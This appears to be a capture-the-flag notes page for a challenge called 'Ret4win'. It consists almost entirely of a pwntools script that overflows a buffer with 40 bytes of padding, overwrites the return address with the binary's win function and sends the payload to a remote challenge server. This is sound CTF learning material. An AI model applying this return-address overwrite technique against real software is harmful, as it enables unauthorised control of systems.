Notes

Ret4win

#!/usr/bin/env python3

from pwn import *
args.LOCAL=False
LocalBin = "/Buckeye/PWN/ret4win/chall"
exe= ELF(LocalBin)
ropex= ROP(exe)


def conn():
    if args.LOCAL:
        r = process(LocalBin)
    else:
        r = remote("pwn.chall.pwnoh.io", 13379)

    return r

r = conn()
OFFSET = b'A'*40
WIN=p64(exe.symbols['win'])
payload = OFFSET  +WIN+ p64(0x0000000000401245)

r.sendlineafter(b'**beep**',payload)
r.interactive()

PreviousBASIC NextFlattened

Last updated 2 years ago